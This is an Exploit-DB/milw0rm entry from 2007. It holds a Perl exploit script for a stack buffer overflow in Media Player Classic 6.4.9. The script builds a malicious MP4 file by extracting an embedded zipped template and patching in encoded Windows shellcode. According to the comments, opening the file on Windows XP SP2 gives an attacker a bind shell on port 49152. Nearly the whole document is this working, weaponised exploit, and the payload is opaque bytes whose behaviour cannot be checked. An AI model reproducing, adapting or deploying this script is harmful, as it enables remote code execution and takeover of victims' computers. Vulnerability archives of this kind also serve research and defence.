Media Player Classic 6.4.9 - '.MP4' File Stack Overflow

EDB-ID:

4701


Author:

SYS 49152

Type:

local


Platform:

Windows

Date:

2007-12-08


#!/bin/perl
#
# Media Player Classic 6.4.9 MP4 Stack Overflow
#  
# 0-day discovered and exploited by SYS 49152
#  
# Tested on win XP SP2 ENG
# Shell on port 49152
#  
# usage:
# - download this codec in order to manage MP4 content:
#   http://www.3ivx.com/coral/3ivx_d4_451_win.exe
#  
# - open the MP4 file with mplayerc.exe  
#  
# SYS 49152
# gforce(put the @ here)operamail(put the . here)com
#
# update:
# the latest 5.0.1 codec is still vulnerable
 
use Archive::Zip qw( :ERROR_CODES :CONSTANTS );  
 
$zip_data = # code 724981
"\x50\x4B\x03\x04\x14\x00\x00\x00\x08\x00\xB3\xB1\x30\x36\xF3".
"\x13\xD9\x53\x73\x02\x00\x00\x57\x04\x00\x00\x19\x00\x00\x00".
"\x53\x59\x53\x5F\x34\x39\x31\x35\x32\x5F\x4D\x50\x34\x5F\x66".
"\x6F\x72\x5F\x4D\x50\x43\x2E\x6D\x70\x34\x63\x60\x60\xBF\x9C".
"\x9B\x9F\x5F\xC6\xC0\xC0\x90\x93\x5B\x96\x91\x02\xA4\x19\x0E".
"\xBC\xF1\x2B\x3B\xF0\x26\x2C\x99\x81\x81\xF9\x05\x88\xCF\xC0".
"\x08\x46\x08\x80\xC2\xC1\xE4\x3B\x30\xE0\x05\x40\xD5\xEC\xF1".
"\xA5\x29\x25\x89\x40\x3A\x3C\x37\x15\x44\x83\x81\x62\x46\x4A".
"\x4E\x11\x4C\x51\x6E\x4A\x66\x51\x62\x41\x41\x0E\x92\x3E\x76".
"\xAD\xCC\x9C\xE2\x12\x20\x43\x62\x65\x5E\x62\x2E\x90\x16\x48".
"\x49\x04\x6B\x86\x59\x2F\xB1\xB2\xBC\xA8\x04\xAB\xB8\x63\x50".
"\x08\x56\xF1\xC4\x9C\x24\x4C\x71\x36\xF3\x95\xC9\xB9\x40\x73".
"\x98\x6F\x21\x8B\x4F\x40\x02\xAC\x4C\x8C\xBE\xBA\x8C\x8C\xBE".
"\x0E\xBE\x0D\x37\x80\x04\x90\x62\x85\x50\x8C\x10\xCA\x01\x42".
"\x75\x41\xA8\x06\x08\x55\x0A\xA1\x58\x20\x14\x37\x84\xFA\xE4".
"\xFB\x9A\x0C\xD0\x9D\x16\xEE\xE0\xCC\xF1\xB3\xA4\xE3\xF5\x84".
"\x41\x03\x5E\xBF\x16\xCD\x99\xE0\x3A\xD1\x97\x95\x05\x12\x36".
"\x01\xBE\x87\x83\x23\x83\x4D\x2C\x0D\x4D\x8D\x14\x82\x42\x7D".
"\x5C\xA3\x14\x8D\x4F\x36\xBF\xDC\x70\xF3\xDD\xCD\x12\x95\x2F".
"\xD1\x8D\xC5\xC2\x2B\x5C\xBF\xEE\x68\x7E\xFD\xE7\xD1\x97\x10".
"\x7D\xB9\xAF\x0E\x7B\xB8\xDC\xC3\x55\xEB\xAE\xF4\x24\xD6\xFD".
"\x9D\x72\xAE\x73\xEF\x05\x17\x29\xE3\xE7\xB1\x75\xCF\x3B\x5C".
"\xE4\x3E\x2A\x17\xD6\xED\x74\x2B\x31\x55\x64\x39\x68\x7A\x66".
"\x7D\x8B\xFD\xD6\x95\xED\x72\x3E\x93\x05\x2F\x4E\xB8\xBB\xA0".
"\xEE\x79\x8F\x8B\xDC\x3D\x65\xCF\x7D\xC6\xDF\x23\xBF\x04\xAF".
"\xCE\xAC\x33\x3C\x92\xF8\xF2\x66\x76\x89\xDE\x1D\x65\xB6\xA3".
"\xC6\x2F\x3C\xEB\x4E\x6C\x79\x51\xF7\x63\x81\xF4\x5C\xB3\x67".
"\xDE\x92\x2F\xC2\x27\x4F\x7E\x7D\x4E\xF7\x58\xD7\x01\xA3\xB6".
"\xAE\xEF\x82\x5C\x19\x07\xFA\x24\x5C\x26\x8B\x72\xE5\x7D\x3F".
"\x23\x70\x4F\x73\xC5\xDF\x5D\x7F\xF5\xBF\xBB\x57\xE8\xEA\x6C".
"\x8C\x7D\xB1\xC8\xBD\x4E\x6C\xD9\xEB\xDF\x62\xDB\x5E\xBF\x16".
"\xE3\xCA\x38\xA7\x6B\xBA\xE3\x9C\x58\x4D\xA4\xAD\x6E\xE0\xA2".
"\x1B\x4D\x40\x39\xFD\xA7\x2F\xFF\xEE\x52\xBD\xC0\xF3\xE2\x76".
"\xE0\xFF\x5D\xCA\xAF\x41\x6C\x5F\x9E\xE2\x8F\x40\xF6\x8B\x3F".
"\x82\x0B\xDC\x2B\xAE\xCD\x8D\xBF\xD8\xDC\xF3\x3E\x7C\x32\x90".
"\xAD\x3C\xFF\xCE\x39\xDD\x69\x57\x15\x17\xCC\x7F\xF1\x31\xC7".
"\xD2\xD0\x5F\x7F\xA3\xA1\x57\x89\xA9\x37\xD3\xEE\xED\x53\xC3".
"\xD8\x6F\x6A\xAB\xDA\x9F\x15\x66\x7E\x37\xF7\x54\xD8\xB7\xC7".
"\xEE\x77\x19\xB9\xF2\x3E\x0B\x2D\x7F\xF9\x53\x64\xFE\xCE\x9F".
"\x22\x0B\x5E\x86\x4F\x9D\x2B\x5A\xE8\x60\xFD\x3A\x7C\xF2\x7C".
"\xF7\xF0\x22\xAE\x0C\x65\x21\x4E\xEB\x1C\x45\xAE\xBC\x5F\x40".
"\xFB\xDC\xBB\x45\x6F\xFC\xDE\xA5\xEC\x5E\x01\x0C\xC4\x52\x70".
"\x52\x4E\x4F\xCD\xC3\x92\xC4\x15\x4A\x8A\xB2\x41\xE2\x12\x50".
"\x71\x74\xA0\x90\x92\x59\x9C\x8D\x47\x5E\xAA\x24\xB7\x20\x1F".
"\x48\x0B\x41\xE5\x45\xE1\x32\x92\xC9\x05\x99\xA0\xDC\x29\x88".
"\x2E\xC3\x91\x0B\x14\x01\x00\x50\x4B\x01\x02\x14\x00\x14\x00".
"\x00\x00\x08\x00\xB3\xB1\x30\x36\xF3\x13\xD9\x53\x73\x02\x00".
"\x00\x57\x04\x00\x00\x19\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x20\x00\x00\x00\x00\x00\x00\x00\x53\x59\x53\x5F\x34\x39\x31".
"\x35\x32\x5F\x4D\x50\x34\x5F\x66\x6F\x72\x5F\x4D\x50\x43\x2E".
"\x6D\x70\x34\x50\x4B\x05\x06\x00\x00\x00\x00\x01\x00\x01\x00".
"\x47\x00\x00\x00\xAA\x02\x00\x00\x00\x00";
 
my $shellcode = # code 724981
"\x33\xC9\x83\xE9\xB0\xD9\xEE\xD9\x74\x24\xF4\x5B\x81\x73\x13".
"\xA8\x45\xF5\xB8\x83\xEB\xFC\xE2\xF4\x54\x2F\x1E\xF5\x40\xBC".
"\x0A\x47\x57\x25\x7E\xD4\x8C\x61\x7E\xFD\x94\xCE\x89\xBD\xD0".
"\x44\x1A\x33\xE7\x5D\x7E\xE7\x88\x44\x1E\xF1\x23\x71\x7E\xB9".
"\x46\x74\x35\x21\x04\xC1\x35\xCC\xAF\x84\x3F\xB5\xA9\x87\x1E".
"\x4C\x93\x11\xD1\x90\xDD\xA0\x7E\xE7\x8C\x44\x1E\xDE\x23\x49".
"\xBE\x33\xF7\x59\xF4\x53\xAB\x69\x7E\x31\xC4\x61\xE9\xD9\x6B".
"\x74\x2E\xDC\x23\x06\xC5\x33\xE8\x49\x7E\xC8\xB4\xE8\x7E\xF8".
"\xA0\x1B\x9D\x36\xE6\x4B\x19\xE8\x57\x93\x93\xEB\xCE\x2D\xC6".
"\x8A\xC0\x32\x86\x8A\xF7\x11\x0A\x68\xC0\x8E\x18\x44\x93\x15".
"\x0A\x6E\xF7\xCC\x10\xDE\x29\xA8\xFD\xBA\xFD\x2F\xF7\x47\x78".
"\x2D\x2C\xB1\x5D\xE8\xA2\x47\x7E\x16\xA6\xEB\xFB\x16\xB6\xEB".
"\xEB\x16\x0A\x68\xCE\x2D\x35\xB8\xCE\x16\x7C\x59\x3D\x2D\x51".
"\xA2\xD8\x82\xA2\x47\x7E\x2F\xE5\xE9\xFD\xBA\x25\xD0\x0C\xE8".
"\xDB\x51\xFF\xBA\x23\xEB\xFD\xBA\x25\xD0\x4D\x0C\x73\xF1\xFF".
"\xBA\x23\xE8\xFC\x11\xA0\x47\x78\xD6\x9D\x5F\xD1\x83\x8C\xEF".
"\x57\x93\xA0\x47\x78\x23\x9F\xDC\xCE\x2D\x96\xD5\x21\xA0\x9F".
"\xE8\xF1\x6C\x39\x31\x4F\x2F\xB1\x31\x4A\x74\x35\x4B\x02\xBB".
"\xB7\x95\x56\x07\xD9\x2B\x25\x3F\xCD\x13\x03\xEE\x9D\xCA\x56".
"\xF6\xE3\x47\xDD\x01\x0A\x6E\xF3\x12\xA7\xE9\xF9\x14\x9F\xB9".
"\xF9\x14\xA0\xE9\x57\x95\x9D\x15\x71\x40\x3B\xEB\x57\x93\x9F".
"\x47\x57\x72\x0A\x68\x23\x12\x09\x3B\x6C\x21\x0A\x6E\xFA\xBA".
"\x25\xD0\x47\x8B\x15\xD8\xFB\xBA\x23\x47\x78\x45\xF5\xB8";
 
open(code, ">tempzip.zip") || die "Can't Write temporary File\n";
binmode (code);
print code $zip_data;
close (code);
print "\nTemporary file ready, patching..\n";
my $zip = Archive::Zip->new();
$zip->read( 'tempzip.zip' ) ;
$zip->extractMember( 'SYS_49152_MP4_for_MPC.mp4' );
open(code, "+<SYS_49152_MP4_for_MPC.mp4") || die "Can't Open temporary File\n";
binmode (code);
seek code,619,0;
print code $shellcode;
close (code);
print "Shellcode added, have fun!\n";

# milw0rm.com [2007-12-08]